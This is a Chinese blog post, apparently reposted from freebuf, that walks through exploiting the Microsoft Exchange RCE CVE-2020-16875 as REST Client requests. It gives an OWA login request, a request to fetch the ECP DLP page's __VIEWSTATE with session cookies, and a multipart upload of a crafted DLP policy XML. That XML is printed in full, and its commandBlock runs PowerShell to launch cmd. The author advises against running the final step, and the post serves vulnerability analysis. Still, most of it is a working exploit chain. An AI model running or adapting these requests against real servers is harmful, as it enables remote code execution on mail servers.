使用vscode rest client分析漏洞(CVE-2020-16875) – 作者:qixingyue

微软的exchange 邮件服务器最近被爆出了RCE 漏洞。并有相关人员给出了POC。根据POC 的python 脚本 ,作者拿 vscode 的rest client 分布测试了一下,整个流程。

定义几个变量

@target=target
@username=info2002
@password=123456abc

第一步, 登录验证,主要是获取用户的授权cookie,

## 触发RCE 的一个前提,是需要有一个可以登录的账号密码。
## 登录成功,返回一个 302 跳转,Location 地址为 https://{{target}}/owa
## 自己拷贝返回的cookie,留着下一步使用
POST https://{{target}}/owa/auth.owa
Content-Type: application/x-www-form-urlencoded


destination=https://{{target}}/owa&flags=&username={{username}}&password={{password}}&forcedownlevel=0&passwordText=&isUtf8=1

第二步,获取viewstate 信息

### 注意添加 cookie 信息,cookie 来自上一步的返回
### POST 返回一个提交DLP策略的页面,其中包含一个 上传xml 页面的表单。
### RCE 触发的关键,也是上传一个构建好的xml
### 搜索 __VIEWSTATE 表单,找到后边的value备用
POST https://{{target}}/ecp/DLPPolicy/ManagePolicyFromISV.aspx
Cookie: cadata=PNFf9JJYWv0YzkoX5j6QkPv8joj1HGPxf+y5Qv8HuWCTH0aU8z3dCjjan55k8a6PCKn5EdyZJODa2xaVXd26v0ctAWb9M6HR00K0ox5G0bc=; path=/; secure; HttpOnly,cadataTTL=d6qg8liD1i8O8eDQG6dihg==; path=/; secure; HttpOnly,cadataKey=f7uGUtHEafk0woO1GxggVfWuqzLNXJCa51DcVRzzJLYXKByQJubmtzx3WDGrKoLOQyDVt11c4EtBYIQHPXojnLulHRU8fdqoZLCQoPQm6hlxS3XxKBVwZlXMig1UpRCufLLVpvKuVPVdcl54H2mOB0mqlyryTIETcvBP5Amf/3f1abY3De72kva9VSY6m/ETgnjAxA8XpXyipaYBTG87Rq9OZGszXeIxNGAZ6ZA7wfzEQ0BvG+pVFqeYxhXnm3BnYo+6JGuV5X3+kR1hjyLK12AzDR+3fdkOar0xTwkON6fp44PxcqxHMhCDAtCHCD1NEv8wlJzcE8ze614rV+q8zQ==; path=/; secure; HttpOnly,cadataIV=ctnfcTb/AroSCXjUeyq7OYe2GvlksJYDTlmVv6ushP0ai+6/EtfwnaP2imYOhylwIAI1uhh+YFVNghyNaZ51P6w3RCPAJ+RzpUC+AhsxKVs1A9YL8U64hyMe6LkKz/1QqQG+AMot/DYKpqOw3LKnVXsyxJ7XA84G7NjGPQRu4/TQ/e3BaJgSp3QSfnRjQJ9nkbeIKN/iz/vT3nwLw5MIhueTVb3qvXP2YdEJ7JQcEnSuHN/ggwA5AkXzxDClj/DKntFx7f8DduYhQ+SAAOz0QAs4eu954PIVVJiAvb+PMvqJWbCx2/f7prO6u8nyjJz+j3poOV+EmdtFy77DjAB/w==; path=/; secure; HttpOnly,cadataSig=pkEzUP6+8+ugbBpiNxji+eTVagD/JROaWaKO+e3Nsszri6f+xM7eI5oiOGU637ENE8HgW65EKWIyqwjagSIo60PF0mLvSLKGAKCbhlVU7zX0cVlBeYYBidQhnxYV8KflCBJIL9MbDQ9emwH/HdOBS48JJALybzZ/nIiQeIfJsz0ycQS2DUrUCj2qHqDeXDnqrzGNpDtdeNoe0ADc2zm/bKl59N9YgQkYNuz1OArknrhmj/H0FwDUiEB38cg4I+ckZypvVJwMX1V5rG3Csml7BVgMWaDbo6PP9RYALLF28IxhQ62tDgkXn8ltGcdlo7hdWvGvjEfH1I0s5CuT7qwnEw==; path=/; secure; HttpOnly

第三步,触发RCE (不建议执行)

### 同理 cookie 信息,不能丢。 拿着第二步的 viewstate 信息构建恶意的xml,完成RCE.
### 不建议执行这一步 ,触发你能确保你的服务器的环境不受影响。
### 基本上到第二步就已经可以确认会包含RCE 漏洞了。
POST https://{{target}}/ecp/DLPPolicy/ManagePolicyFromISV.aspx
Cookie: cadata=PNFf9JJYWv0YzkoX5j6QkPv8joj1HGPxf+y5Qv8HuWCTH0aU8z3dCjjan55k8a6PCKn5EdyZJODa2xaVXd26v0ctAWb9M6HR00K0ox5G0bc=; path=/; secure; HttpOnly,cadataTTL=d6qg8liD1i8O8eDQG6dihg==; path=/; secure; HttpOnly,cadataKey=f7uGUtHEafk0woO1GxggVfWuqzLNXJCa51DcVRzzJLYXKByQJubmtzx3WDGrKoLOQyDVt11c4EtBYIQHPXojnLulHRU8fdqoZLCQoPQm6hlxS3XxKBVwZlXMig1UpRCufLLVpvKuVPVdcl54H2mOB0mqlyryTIETcvBP5Amf/3f1abY3De72kva9VSY6m/ETgnjAxA8XpXyipaYBTG87Rq9OZGszXeIxNGAZ6ZA7wfzEQ0BvG+pVFqeYxhXnm3BnYo+6JGuV5X3+kR1hjyLK12AzDR+3fdkOar0xTwkON6fp44PxcqxHMhCDAtCHCD1NEv8wlJzcE8ze614rV+q8zQ==; path=/; secure; HttpOnly,cadataIV=ctnfcTb/AroSCXjUeyq7OYe2GvlksJYDTlmVv6ushP0ai+6/EtfwnaP2imYOhylwIAI1uhh+YFVNghyNaZ51P6w3RCPAJ+RzpUC+AhsxKVs1A9YL8U64hyMe6LkKz/1QqQG+AMot/DYKpqOw3LKnVXsyxJ7XA84G7NjGPQRu4/TQ/e3BaJgSp3QSfnRjQJ9nkbeIKN/iz/vT3nwLw5MIhueTVb3qvXP2YdEJ7JQcEnSuHN/ggwA5AkXzxDClj/DKntFx7f8DduYhQ+SAAOz0QAs4eu954PIVVJiAvb+PMvqJWbCx2/f7prO6u8nyjJz+j3poOV+EmdtFy77DjAB/w==; path=/; secure; HttpOnly,cadataSig=pkEzUP6+8+ugbBpiNxji+eTVagD/JROaWaKO+e3Nsszri6f+xM7eI5oiOGU637ENE8HgW65EKWIyqwjagSIo60PF0mLvSLKGAKCbhlVU7zX0cVlBeYYBidQhnxYV8KflCBJIL9MbDQ9emwH/HdOBS48JJALybzZ/nIiQeIfJsz0ycQS2DUrUCj2qHqDeXDnqrzGNpDtdeNoe0ADc2zm/bKl59N9YgQkYNuz1OArknrhmj/H0FwDUiEB38cg4I+ckZypvVJwMX1V5rG3Csml7BVgMWaDbo6PP9RYALLF28IxhQ62tDgkXn8ltGcdlo7hdWvGvjEfH1I0s5CuT7qwnEw==; path=/; secure; HttpOnly
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW


------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="ctl00$ResultPanePlaceHolder$senderBtn"


ResultPanePlaceHolder_ButtonsPanel_btnNext
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="__VIEWSTATE"


/wEPDwUILTg5MDAzMDFkZKEgV4rq2832c5ZF38whYPpaizHg
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="ctl00$ResultPanePlaceHolder$contentContainer$name"


anytexthere
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="ctl00$ResultPanePlaceHolder$contentContainer$upldCtrl"; filename="rce.xml"
Content-Type:


< ./rce.xml
------WebKitFormBoundary7MA4YWxkTrZu0gW--

贴上一个构造好的XML

<?xml version="1.0" encoding="UTF-8"?>
<dlpPolicyTemplates>
<dlpPolicyTemplate id="F7C29AEC-A52D-4502-9670-141424A83FAB" mode="Audit" state="Enabled" version="15.0.2.0">
<contentVersion>4</contentVersion>
<publisherName>si</publisherName>
<name>
<localizedString lang="en"></localizedString>
</name>
<description>
<localizedString lang="en"></localizedString>
</description>
<keywords></keywords>
<ruleParameters></ruleParameters>
<policyCommands>
<commandBlock>
<![CDATA[ $i=New-object System.Diagnostics.ProcessStartInfo;$i.UseShellExecute=$true;$i.FileName="cmd";$i.Arguments="/c mspaint";$r=New-Object System.Diagnostics.Process;$r.StartInfo=$i;$r.Start() ]]>
</commandBlock>
</policyCommands>
<policyCommandsResources></policyCommandsResources>
</dlpPolicyTemplate>
</dlpPolicyTemplates>

总结:

总体上来说,使用vsocode 的 rest client 来调试一些漏洞还是比较方便的,编写方便,测试方便。

改漏洞应该是属于一个文件上传漏洞,上传一个xml 文件,后端服务在解析xml文件的时候,触发了内部的

commandBlock 模块,进而执行了内部包含的漏洞,引发RCE。

来源:freebuf.com 2020-09-18 11:53:50 by: qixingyue

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论